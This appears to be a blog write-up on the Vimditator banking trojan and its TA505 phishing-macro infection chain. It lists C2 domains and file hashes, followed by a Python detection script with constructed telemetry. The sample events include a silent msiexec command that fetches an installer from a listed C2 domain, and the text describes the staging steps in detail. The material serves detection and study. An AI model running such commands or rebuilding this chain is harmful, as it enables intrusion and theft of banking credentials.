Vimditator

By GoldSparrow in Trojans

Vimditator is a malware threat spread by a campaign that exploits vulnerabilities and targets financial institutions in Italy, Chile, South Korea, India, Malawi and Pakistan. The group behind the Vimditator attacks is not new to the threat landscape and has been active since 2014. This group, TA505, has been linked to attacks that used the Shifu and Dridex banking Trojans, the Neutrino Exploit Kit and the infamous Locky Ransomware, and is believed to operate from Russia.

Vimditator is dangerous because it gives third parties access to the infected machine, from which they can collect critical data such as online banking usernames and passwords and other personally identifiable information, and then use it to act against the computer user. A well-protected machine is rarely infected by threats of this kind, which is what makes security software and file backups so necessary today.

The malicious document used in the phishing campaigns contains macros. When the macros run, they connect to the domain local365office.com and quietly launch msiexec.exe, which downloads an MSI installer. The installer in turn drops another file in a temporary directory, and that file is unpacked into appdata\local\temp, producing three new files: a RAT, a self-extracting archive and a .cmd batch file launcher that also serves as the persistence mechanism on the system.

The .cmd file pings cloudflare.com with three echo requests. The malware does this to confirm that the system is connected to the Internet, so a lone ping to cloudflare.com is a weak indicator on its own and only becomes interesting alongside the other stages of the chain. If the ping requests succeed, the self-extracting archive, which originally poses as a .dll file, is renamed to .exe and extracted using a long password string.

The self-extracting archive drops another four files into C:\ProgramData\Microtik, a directory name that resembles the router vendor MikroTik. The files include the payload, a remote access tool, another batch file launcher and a configuration file used by the malware.

Command and control servers identified in the Vimditator campaigns include:

  • local365office.com
  • office365onlinehome.com
  • afgdhjkrm.pw

MD5 hashes of files associated with Vimditator infections include:

  • c0440bd30ed33cfb7b0e29fbf0debe6f - the .cmd batch file launcher
  • e377557c8f35beeb050370c4479bcb04 - document used in retail company phishing
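The infection chain described above and the indicators listed here translate directly into detection logic. The following is an added example, not code from the original post or from any vendor: it replays constructed Sysmon-style telemetry (process creation, file rename, file creation with hash, DNS query; the field names, host names and file names are assumptions) and flags each stage of the chain, then requires more than one stage on the same host before calling a verdict, because a single indicator such as a ping to cloudflare.com is common in benign activity.

```python
"""Stage-by-stage detection of the Vimditator infection chain.

Added example, not code from the original write-up. Event dicts use assumed
Sysmon-like field names; the sample telemetry at the bottom is constructed.
"""
import re
from typing import Dict, Iterable, List, Tuple

# Indicators taken from the write-up
C2_DOMAINS = {"local365office.com", "office365onlinehome.com", "afgdhjkrm.pw"}
KNOWN_MD5 = {
    "c0440bd30ed33cfb7b0e29fbf0debe6f": "Vimditator .cmd batch launcher",
    "e377557c8f35beeb050370c4479bcb04": "Vimditator phishing document",
}

# Assumed set of Office executables that host the malicious macro
OFFICE_PROCS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
STAGING_DIR = re.compile(r"\\programdata\\microtik\\", re.I)
TEMP_DIR = re.compile(r"\\appdata\\local\\temp\\", re.I)
REMOTE_URL = re.compile(r"https?://", re.I)
# Windows ping with a count of 3 against cloudflare.com
PING_CHECK = re.compile(r"\bping(?:\.exe)?\b.*\s-n\s+3\b.*cloudflare\.com", re.I)


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (stage, detail) pairs for every chain stage the event matches."""
    hits: List[Tuple[str, str]] = []
    kind = ev.get("type")
    if kind == "process":
        image = _basename(ev.get("image", ""))
        parent = _basename(ev.get("parent_image", ""))
        cmdline = ev.get("cmdline", "")
        # Stage 1: Office macro runs msiexec.exe against a remote MSI package
        if image == "msiexec.exe" and parent in OFFICE_PROCS and REMOTE_URL.search(cmdline):
            hits.append(("macro_msiexec", cmdline))
        # Stage 2: the .cmd launcher checks connectivity with three echo requests
        if image in {"cmd.exe", "ping.exe"} and PING_CHECK.search(cmdline):
            hits.append(("ping_check", cmdline))
        # Stage 4: anything executing out of the C:\ProgramData\Microtik staging directory
        if STAGING_DIR.search(ev.get("image", "")):
            hits.append(("staging_dir", ev["image"]))
    elif kind == "file_rename":
        src, dst = ev.get("src", ""), ev.get("dst", "")
        # Stage 3: self-extracting archive posing as .dll renamed to .exe in %LOCALAPPDATA%\Temp
        if TEMP_DIR.search(src) and src.lower().endswith(".dll") and dst.lower().endswith(".exe"):
            hits.append(("dll_to_exe", f"{src} -> {dst}"))
    elif kind == "dns":
        name = ev.get("query", "").lower().rstrip(".")
        if name in C2_DOMAINS or any(name.endswith("." + d) for d in C2_DOMAINS):
            hits.append(("c2_dns", name))
    elif kind == "file_create":
        md5 = ev.get("md5", "").lower()
        if md5 in KNOWN_MD5:
            hits.append(("known_hash", f"{ev.get('path', '?')}: {KNOWN_MD5[md5]}"))
    return hits


def triage(events: Iterable[Dict[str, str]], min_stages: int = 2) -> Dict[str, Dict]:
    """Group hits per host; a host with at least min_stages distinct stages is flagged."""
    report: Dict[str, Dict] = {}
    for ev in events:
        entry = report.setdefault(ev.get("host", "unknown"), {"stages": set(), "findings": []})
        for stage, detail in classify(ev):
            entry["stages"].add(stage)
            entry["findings"].append(f"[{stage}] {detail}")
    for entry in report.values():
        entry["verdict"] = "vimditator_chain" if len(entry["stages"]) >= min_stages else "clean"
    return report


# Constructed sample telemetry (not real logs): one infected host, one clean host
SAMPLE_EVENTS = [
    {"host": "wks-01", "type": "process", "image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "cmdline": "msiexec.exe /q /i http://local365office.com/update.msi"},
    {"host": "wks-01", "type": "dns", "query": "local365office.com"},
    {"host": "wks-01", "type": "file_create", "path": r"C:\Users\bob\AppData\Local\Temp\run.cmd",
     "md5": "C0440BD30ED33CFB7B0E29FBF0DEBE6F"},
    {"host": "wks-01", "type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\msiexec.exe", "cmdline": "cmd.exe /c ping -n 3 cloudflare.com"},
    {"host": "wks-01", "type": "file_rename", "src": r"C:\Users\bob\AppData\Local\Temp\ufutils.dll",
     "dst": r"C:\Users\bob\AppData\Local\Temp\ufutils.exe"},
    {"host": "wks-01", "type": "process", "image": r"C:\ProgramData\Microtik\svc.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe", "cmdline": "svc.exe"},
    # Benign activity on another host: an MSI installed from Explorer and an ordinary ping
    {"host": "wks-02", "type": "process", "image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": r"msiexec.exe /i C:\Users\ann\Downloads\7zip.msi"},
    {"host": "wks-02", "type": "process", "image": r"C:\Windows\System32\PING.EXE",
     "parent_image": r"C:\Windows\System32\cmd.exe", "cmdline": "ping cloudflare.com"},
]

if __name__ == "__main__":
    for host, entry in triage(SAMPLE_EVENTS).items():
        print(host, entry["verdict"], sorted(entry["stages"]))
        for line in entry["findings"]:
            print("   ", line)
```

The per-stage rules are deliberately narrow (Office parent plus remote URL for msiexec, the exact three-request ping, the .dll-to-.exe rename under Temp) so that each one stays quiet on its own; the `min_stages` threshold in `triage` is what turns them into an alert. Subdomains of the listed C2 domains are matched as well, since the page lists the domains rather than specific hostnames.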
